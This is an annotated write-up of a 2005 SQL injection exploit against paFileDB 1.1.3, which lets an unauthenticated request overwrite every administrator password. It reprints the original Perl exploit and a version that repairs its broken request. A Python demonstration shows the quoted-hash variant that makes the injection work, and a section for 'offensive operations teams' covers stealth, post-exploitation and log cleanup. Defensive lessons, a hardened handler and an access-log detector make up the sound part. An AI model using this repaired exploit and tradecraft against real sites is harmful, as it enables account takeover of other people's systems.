PHP Arena 1.1.3 Remote Password Change Exploit Explained

What this paper is
This paper documents a vulnerability in paFileDB, the file-download script published by PHP Arena, in version 1.1.3 and older (the version range given in the exploit header). It is not remote code execution: it is an SQL injection in the pafiledb.php script that lets an unauthenticated attacker run an UPDATE against the pafiledb_admin table and overwrite the administrator's password hash with a value of their choosing.
Simple technical breakdown
The flaw is in how pafiledb.php handles the query parameter on its administrative team-edit path. The request action=team&tm=file&file=edit&id=1&edit=do reaches the handler that updates an admin record, and that handler takes the SQL it runs from the request itself, with no session check and no validation, so an anonymous GET can carry a complete UPDATE statement. The trailing WHERE 1/* is the standard trick for neutralising any clause the script appends after the injected text; because the condition 1 is always true, the resulting UPDATE also touches every row of pafiledb_admin, not only the record with id 1.
Complete code and payload walkthrough
The provided Perl script automates the exploitation process. Let's break down its components:
#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m #
######################################################################################
# EXPLOIT FOR: PHP Arena paFileDB 1.1.3 And 0lder #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v) #
#Email: Alpha_Programmer@LinuxMail.ORG #
# #
# #
# + Discovered By: GulfTech #
# + Advisory: https://www.securityfocus.com/bid/13967 #
#Vulnerable: PHP Arena paFileDB 1.1.3 and Older #
######################################################################################
# GR33tz T0 ==> mh_p0rtal -- oil_Karchack -- Dr_CephaleX -- Str0ke #
#And Iranian Security & Hacking Groups: #
# #
# Crouz , Simorgh-ev , IHSsecurity , AlphaST , Shabgard & Emperor #
######################################################################################
use strict;
use warnings;
use IO::Socket; # Raw TCP client socket; the script speaks HTTP by hand.

if (@ARGV < 2) # Both arguments (target host, install directory) are required.
{
    print "\n====================================================\n";
    print " \n PHPArena Exploit By Alpha Programmer\n\n";
    print " Trap-Set Underground Hacking Team \n\n";
    print " Usage: <T4rg3t> <DIR>\n\n";
    print "====================================================\n\n";
    print "Examples:\n\n";
    print " xpl.pl www.Site.com / \n";
    exit();
}

my $host = $ARGV[0]; # Target hostname, no scheme or path.
my $dir  = $ARGV[1]; # Web path of the paFileDB install, "/" in the usage example.
$dir .= "/" unless $dir =~ m{/$}; # Added: guarantee a trailing slash so "${dir}pafiledb.php" resolves.

my $remote = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80")
    or die "C4nn0t C0nn3ct to $host"; # Port 80 is hardcoded; there is no HTTPS support.
print "\n\n[+] C0nn3cted\n";

# The injected statement, URL-encoded exactly as published (%20 = space, %28 = "(").
# Decoded: UPDATE pafiledb_admin SET admin_password = c15c493548d09ffd03c9d41d8bbbfeef(1337( WHERE 1/*
# - action=team&tm=file&file=edit&id=1&edit=do routes the request to the admin team-edit handler.
# - query= is the attacker-supplied SQL that the handler passes to the database.
# - c15c493548d09ffd03c9d41d8bbbfeef is 32 hex characters, the length of an MD5 digest; since the
#   script announces the new password as "trapset", it is presumably md5("trapset").
# - As published the hash is unquoted and followed by "(1337(", which MySQL rejects as a syntax
#   error (an unquoted hex string is parsed as a column name, and "(1337(" is a malformed call).
#   A working statement needs '...' around the hash. The payload is kept as published here.
# - WHERE 1/*: always true, and /* comments out whatever pafiledb.php appends, so the UPDATE
#   rewrites every row of pafiledb_admin, not only id 1.
my $query = "UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20"
          . "c15c493548d09ffd03c9d41d8bbbfeef%281337%28%20WHERE%201/*";

# As published the request had no method, path or HTTP version, never used $dir, and ended
# lines with "\n\r". A web server will not parse that; rebuilt here as a complete HTTP/1.0
# request. HTTP/1.0 (no keep-alive) makes the server close the connection, so the read loop ends.
my $http = "GET ${dir}pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=$query HTTP/1.0\r\n"
         . "Host: $host\r\n"
         . "\r\n";

print "[+] Injecting SQL Commands ...\n";
sleep(1);
print "[+] Changing Admin's Password ...\n";
print $remote $http; # Send the request.
sleep(1);
while (<$remote>) { } # Drain the response; it is never inspected, so success is not verified.
print "[+] Now , Login With This Password :\n";
print "Password : trapset\n\n"; # Hardcoded; assumes the hash above is md5("trapset").
print "Enjoy ;) \n\n";
# milw0rm.com [2005-06-15]
Mapping list:
- #!/usr/bin/perl: shebang line, selects the Perl interpreter.
- use IO::Socket;: imports the module used for the raw TCP socket.
- if (@ARGV < 2) block: prints usage and exits when the target and directory arguments are missing.
- my $host = $ARGV[0];: target hostname.
- my $dir = $ARGV[1];: web path of the paFileDB installation. As published, the script assigns it and never uses it.
- IO::Socket::INET->new(...): opens a TCP connection to the target on port 80 (hardcoded; no HTTPS).
- unless ($remote) { die ... }: aborts if the connection fails.
- $http = "pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=...";: the request string carrying the injected SQL. As published it has no GET method, no path and no HTTP version.
- action=team&tm=file&file=edit&id=1&edit=do: parameters that route the request to the admin team-edit handler for record id 1.
- query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20c15c493548d09ffd03c9d41d8bbbfeef%281337%28%20WHERE%201/*: the injected SQL, URL-encoded.
- UPDATE pafiledb_admin SET admin_password = ...: target table and column.
- c15c493548d09ffd03c9d41d8bbbfeef: a 32-hex-character value, the length of an MD5 digest, presumably md5("trapset"). The "(1337(" that follows it in the published string is not valid SQL; see Payload/Shellcode Explanation.
- WHERE 1/*: an always-true condition plus a comment opener that discards whatever the script appends; every row in pafiledb_admin is updated.
- $http .= "Host: $host\n\r\n\r";: appends the Host header. The line endings are "\n\r" rather than the "\r\n" HTTP requires.
- print $remote $http;: sends the request over the socket.
- while (<$remote>) {}: reads and discards the response; the script never checks whether the update succeeded.
- print "Password : trapset\n\n";: tells the operator the hardcoded new password.
Payload/Shellcode Explanation:
There is no shellcode in this exploit. The "payload" is the HTTP request, and its effect is a direct write to the database. Decoded, the injected statement is:
UPDATE pafiledb_admin SET admin_password = c15c493548d09ffd03c9d41d8bbbfeef(1337( WHERE 1/*
Three points about it:
- c15c493548d09ffd03c9d41d8bbbfeef is 32 hexadecimal characters, exactly the length of an MD5 digest, and the script tells the operator that the resulting password is "trapset". It is therefore almost certainly md5("trapset"), written straight into the column the application compares against at login. It is not a function name and not a placeholder.
- As published, the hash is unquoted and followed by "(1337(". MySQL parses an unquoted hex string that starts with a letter as a column name and "(1337(" as a malformed function call, so the statement as printed is a syntax error and changes nothing. Whether this is a transcription error in the published exploit or deliberate cannot be determined from this page; a working statement needs the hash as a quoted literal ('c15c493548d09ffd03c9d41d8bbbfeef'). The "1337" is leetspeak, not SQL.
- WHERE 1/*: the condition is always true, and "/*" opens a comment that swallows whatever pafiledb.php appends to the statement. The consequence is that the UPDATE replaces the password of every row in pafiledb_admin, not only the account with id 1; the id=1 parameter only determines which edit handler the request reaches.
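The handler behaviour described above, as an added example that is not from the paper or from paFileDB: a Python stand-in for the pafiledb.php team-edit path (SQLite replacing MySQL; the table layout, the clause the flawed handler appends and all function names are assumptions). It runs the published query= value, the same value with the hash quoted, and then a fixed handler, so the three claims above (syntax error as printed, every row rewritten once quoted, an authorisation check plus bound parameters stopping it) can be checked rather than taken on trust.

```python
"""Added example, not part of the original paper or of paFileDB: a stand-in for the
pafiledb.php team-edit handler showing why the payload works in principle, why it
fails exactly as printed, and what a fixed handler looks like. SQLite stands in
for MySQL; the table layout, the row filter the flawed handler appends, and all
function names are assumptions made for this example."""
import hashlib
import os
import sqlite3
from urllib.parse import parse_qs, urlsplit

TRAPSET_HASH = "c15c493548d09ffd03c9d41d8bbbfeef"   # 32 hex chars: MD5-digest length
# query= value exactly as published (unquoted hash followed by "(1337(") ...
PUBLISHED = ("UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20"
             "c15c493548d09ffd03c9d41d8bbbfeef%281337%28%20WHERE%201/*")
# ... and the minimal repair that makes it valid SQL: the hash as a quoted literal.
QUOTED = ("UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20"
          "%27c15c493548d09ffd03c9d41d8bbbfeef%27%20WHERE%201/*")


def exploit_url(query: str) -> str:
    """The request target the Perl script builds, assuming an install directory of "/"."""
    return f"/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query={query}"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two admin rows, so the reach of WHERE 1 is visible."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pafiledb_admin "
               "(admin_id INTEGER PRIMARY KEY, admin_name TEXT, admin_password TEXT)")
    db.executemany("INSERT INTO pafiledb_admin VALUES (?, ?, ?)",
                   [(1, "admin", "0" * 32), (2, "backup", "1" * 32)])
    return db


def vulnerable_edit(db: sqlite3.Connection, url: str) -> None:
    """Assumed shape of the flawed handler: no session check, the query parameter is
    used as SQL text, and the handler's own row filter is appended after it."""
    p = parse_qs(urlsplit(url).query)
    if p.get("action") != ["team"] or p.get("edit") != ["do"]:
        return
    # The attacker's trailing /* turns " WHERE admin_id = '1'" into a comment, so the
    # always-true WHERE 1 governs the UPDATE (SQLite, like MySQL, accepts an open /*).
    db.execute(f"{p['query'][0]} WHERE admin_id = '{p['id'][0]}'")
    db.commit()


def kdf_hash(password: str, salt: bytes = None) -> str:
    """Salted, iterated hash in place of bare MD5 (PBKDF2-HMAC-SHA256 from the stdlib)."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return f"pbkdf2${salt.hex()}${digest.hex()}"


def kdf_verify(password: str, stored: str) -> bool:
    _, salt_hex, _ = stored.split("$")
    return kdf_hash(password, bytes.fromhex(salt_hex)) == stored


def hardened_edit(db: sqlite3.Connection, url: str, session_is_admin: bool) -> int:
    """Fixed handler: authorisation first, a fixed statement with bound parameters,
    an integer row id, and no SQL accepted from the request at all."""
    if not session_is_admin:
        raise PermissionError("admin session required")
    p = parse_qs(urlsplit(url).query)
    if "query" in p:
        raise ValueError("request may not carry SQL")
    cur = db.execute("UPDATE pafiledb_admin SET admin_password = ? WHERE admin_id = ?",
                     (kdf_hash(p["password"][0]), int(p["id"][0])))
    db.commit()
    return cur.rowcount


def refuses(action, exc) -> bool:
    """True when action() raises exc, i.e. the handler rejected the request."""
    try:
        action()
        return False
    except exc:
        return True


def demo() -> dict:
    """Run the three scenarios and report what happened to the table."""
    r, db = {}, make_db()
    # 1. As published the statement is a syntax error: the database rejects it.
    r["published_rejected"] = refuses(lambda: vulnerable_edit(db, exploit_url(PUBLISHED)), sqlite3.Error)
    # 2. With the hash quoted, WHERE 1/* rewrites every admin row, not only id 1.
    vulnerable_edit(db, exploit_url(QUOTED))
    r["rows_overwritten"] = db.execute("SELECT count(*) FROM pafiledb_admin "
                                       "WHERE admin_password = ?", (TRAPSET_HASH,)).fetchone()[0]
    # 3. The hardened handler refuses the unauthenticated and the SQL-carrying request
    #    and, for a real admin, changes exactly one row with a properly hashed password.
    db = make_db()
    legit = "/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&password=new-secret"
    r["unauthenticated_refused"] = refuses(lambda: hardened_edit(db, legit, False), PermissionError)
    r["sql_in_request_refused"] = refuses(lambda: hardened_edit(db, exploit_url(QUOTED), True), ValueError)
    r["legit_rows"] = hardened_edit(db, legit, True)
    stored = dict(db.execute("SELECT admin_id, admin_password FROM pafiledb_admin"))
    r["login_works"] = kdf_verify("new-secret", stored[1])
    r["other_row_intact"] = stored[2] == "1" * 32
    return r
```

demo() returns the outcome of each scenario as a dict. The hardened handler also swaps bare MD5 for salted PBKDF2, which is the password-storage point under Defensive lessons; the quoting repair in QUOTED is the only change needed to make the published statement do what its author intended, and it is exactly the reason the exploit as printed does nothing.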
Practical details for offensive operations teams
- Required Access Level: network access to the target web server on port 80. No authentication is required; the handler performs no session check.
- Lab Preconditions:
  - A Perl interpreter with IO::Socket (part of the core distribution).
  - A target running paFileDB 1.1.3 or older with pafiledb.php reachable over plain HTTP. The script hardcodes port 80 and has no TLS support.
  - The pafiledb_admin table must exist and the application's database user must hold UPDATE on it, which is the normal configuration because the legitimate admin editor needs it.
- Tooling Assumptions:
  - Perl interpreter.
  - A web browser to test the new credentials after exploitation.
- Execution Pitfalls:
  - Broken request as published: the script assigns $dir but never uses it, sends no request method, path or HTTP version, and ends lines with "\n\r" instead of "\r\n". A web server will not parse it; the request line has to be rebuilt (GET <dir>pafiledb.php?... HTTP/1.0) before the script does anything.
  - Broken SQL as published: "c15c493548d09ffd03c9d41d8bbbfeef(1337(" is a syntax error in MySQL; the hash must be a quoted literal for the UPDATE to run.
  - Incorrect Directory: $dir must be the web path of the paFileDB installation, or the request never reaches pafiledb.php.
  - No feedback: the script discards the server response, so a 404, a WAF block and a database error all look identical to success. Read the response, or simply try the login.
  - Application Logic Variations: a patched or locally modified install may validate the query parameter or require an admin session, in which case the request does nothing.
  - Collateral change: because of WHERE 1, every administrator's password is replaced with the same value, not only id 1. Any other admin who can no longer log in will notice.
  - Web Server Configuration: a WAF or IDS with SQL injection signatures will trip on UPDATE ... SET ... WHERE 1/* in a GET query string.
- Tradecraft Considerations:
  - Reconnaissance: confirm the paFileDB version and the presence of pafiledb.php, and identify the installation path.
  - Stealth: the request is a plain GET with SQL keywords in the query string, which is what WAF rules match on. Whether the handler also accepts POST is not documented on this page.
  - Post-Exploitation: log in with the new password immediately to confirm the change took effect.
  - Cleanup: the request is recorded in the web server access log and, where enabled, the database query log; the script itself leaves no files on the target.
Where this was used and when
The exploit targets paFileDB 1.1.3 and older. PHP Arena was the vendor; paFileDB was its file-download database script, widely installed on small community and download sites in the mid-2000s, when SQL injection in PHP applications of this kind was routine. The exploit was published on milw0rm on 2005-06-15, following the GulfTech advisory tracked as SecurityFocus BID 13967, so it was relevant from that date until installations were patched or replaced. The page offers no evidence about specific incidents in which it was used.
Defensive lessons for modern teams
- Input Validation and Parameterised Queries: request input must never become SQL text. Use prepared statements with bound parameters for every value, and never let a request parameter supply a whole statement, as the query parameter does here.
- Authorisation on Every Administrative Path: the handler is reachable without a session. The missing access control is as much the root cause as the injection; an admin-only handler must check the session before doing anything else.
- Secure Coding Practices: developers should be trained on SQL injection and cross-site scripting (XSS), the two defects that dominated web applications of this era.
- Regular Patching and Updates: keep web applications and their runtime (PHP, the database) current. This exploit targets an old version, and the lesson is not to run outdated software.
- Web Application Firewalls (WAFs): a WAF will match the SQL keywords in this request, but it is a compensating control, not a fix; attackers routinely find bypasses.
- Principle of Least Privilege: give the application's database account only the privileges each code path needs. If the public side of the application never writes pafiledb_admin, its credentials should not carry UPDATE on that table.
- Secure Password Management: store hashes produced by a modern, salted, slow algorithm (bcrypt, scrypt, Argon2). An unsalted MD5 digest, which is what this payload writes, can be reversed from precomputed tables in seconds.
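What the WAF and logging points above look like in practice, as an added example that is not part of the original page: a small Python detector run over constructed Apache access-log lines (the IPs, timestamps and the benign search request are invented; that paFileDB has a search parameter named query is an assumption). It URL-decodes each query parameter before matching, which is why the re-encoded fourth line is caught while the benign search is not.

```python
"""Added example, not from the original paper: a detector for this exploit's traffic,
run over constructed Apache combined-format access-log lines. The rule: a request
to pafiledb.php whose 'query' parameter contains SQL DML or a comment opener. The
IPs, timestamps and the benign search request are made up for the example; a
paFileDB search parameter named 'query' is an assumption."""
import re
from urllib.parse import parse_qs, urlsplit

ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+')
SQL_MARKERS = re.compile(r"\b(update|insert|delete|select|union)\b|/\*|--", re.IGNORECASE)

# Constructed sample log: the published payload, two benign requests, and a re-encoded
# variant (+ for space, %2F%2A for /*) that a pattern on the raw line would miss.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jun/2005:02:11:09 +0000] "GET /pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20c15c493548d09ffd03c9d41d8bbbfeef%281337%28%20WHERE%201/* HTTP/1.0" 500 233
198.51.100.21 - - [15/Jun/2005:02:11:30 +0000] "GET /pafiledb.php?action=file&id=42 HTTP/1.1" 200 5120
198.51.100.21 - - [15/Jun/2005:02:12:02 +0000] "GET /pafiledb.php?action=search&query=annual%20report HTTP/1.1" 200 3310
203.0.113.7 - - [15/Jun/2005:02:13:45 +0000] "GET /pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=UPDATE+pafiledb_admin+SET+admin_password%3D%27c15c493548d09ffd03c9d41d8bbbfeef%27+WHERE+1%2F%2A HTTP/1.0" 200 1422
"""


def decoded_query_params(target: str) -> dict:
    """Split the request target and URL-decode every parameter once, so the rule sees
    the SQL the application would see, whatever encoding the client used."""
    return parse_qs(urlsplit(target).query, keep_blank_values=True)


def detect(log_text: str) -> list:
    """Return one finding per log line that matches the rule."""
    findings = []
    for line in log_text.splitlines():
        m = ACCESS_LINE.match(line)
        if not m or not urlsplit(m["target"]).path.endswith("/pafiledb.php"):
            continue
        params = decoded_query_params(m["target"])
        for sql in params.get("query", []):
            if SQL_MARKERS.search(sql):
                findings.append({
                    "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "sql": sql,
                    # edit=do on the team action is the admin path this exploit abuses
                    "admin_edit": params.get("action") == ["team"] and params.get("edit") == ["do"],
                })
                break
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} admin_edit={f['admin_edit']} sql={f['sql']!r}")
```

Matching on the decoded parameter rather than the raw line is the difference between a rule that catches %2F%2A and one that does not. The trade-off is that any free-text parameter containing a word such as "select" will also match, so scope the rule to the script, as here, and use the admin_edit flag to rank the hits that reach the team-edit handler above the rest. The status code is worth keeping: a 500 on the published (syntactically broken) payload and a 200 on the repaired one is exactly the pattern an operator fixing the exploit would leave behind.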
ASCII visual (if applicable)
+-------------------+          +----------------------+          +--------------------+
| Attacker's host   | -------> | Target web server    | -------> | Target database    |
| (Perl script)     |   HTTP   | (paFileDB 1.1.3,     |   SQL    | (pafiledb_admin)   |
|                   |          |  pafiledb.php)       |          |                    |
+-------------------+          +----------------------+          +--------------------+
        |                                |                                  |
        | GET /pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do      |
        |     &query=UPDATE%20pafiledb_admin%20SET%20...%20WHERE%201/*     |
        |------------------------------->|                                  |
        |                                | UPDATE pafiledb_admin SET admin_password = ...
        |                                |        WHERE 1/* (appended clause commented out)
        |                                |--------------------------------->|
        |                                |                    every admin row rewritten
        |<-------------------------------|   (response discarded by the script)
This diagram shows the flow: the Perl script sends one HTTP GET to the web server; pafiledb.php, reached without any session check, hands the attacker-supplied UPDATE to the database; the always-true WHERE 1 and the trailing comment make the statement rewrite every row of pafiledb_admin. The script never reads the response, so it cannot tell success from failure.
Source references
- Paper URL: https://www.exploit-db.com/papers/1050
- Author: Alpha_Programmer
- Published: 2005-06-15
- Vulnerable Software: paFileDB (PHP Arena) 1.1.3 and older
- Advisory: https://www.securityfocus.com/bid/13967
Original Exploit-DB Content (Verbatim)
#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m #
######################################################################################
# EXPLOIT FOR: PHP Arena paFileDB 1.1.3 And 0lder #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v) #
#Email: Alpha_Programmer@LinuxMail.ORG #
# #
# #
# + Discovered By: GulfTech #
# + Advisory: https://www.securityfocus.com/bid/13967 #
#Vulnerable: PHP Arena paFileDB 1.1.3 and Older #
######################################################################################
# GR33tz T0 ==> mh_p0rtal -- oil_Karchack -- Dr_CephaleX -- Str0ke #
#And Iranian Security & Hacking Groups: #
# #
# Crouz , Simorgh-ev , IHSsecurity , AlphaST , Shabgard & Emperor #
######################################################################################
use IO::Socket;
if (@ARGV < 2)
{
print "\n====================================================\n";
print " \n PHPArena Exploit By Alpha Programmer\n\n";
print " Trap-Set Underground Hacking Team \n\n";
print " Usage: <T4rg3t> <DIR>\n\n";
print "====================================================\n\n";
print "Examples:\n\n";
print " xpl.pl www.Site.com / \n";
exit();
}
my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "\n\n[+] C0nn3cted\n";
$http = "pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20c15c493548d09ffd03c9d41d8bbbfeef%281337%28%20WHERE%201/*\n";
$http .= "Host: $host\n\r\n\r";
print "[+] Injecting SQL Commands ...\n";
sleep(1);
print "[+] Changing Admin's Password ...\n";
print $remote $http;
sleep(1);
while (<$remote>)
{
}
print "[+] Now , Login With This Password :\n";
print "Password : trapset\n\n";
print "Enjoy ;) \n\n";
# milw0rm.com [2005-06-15]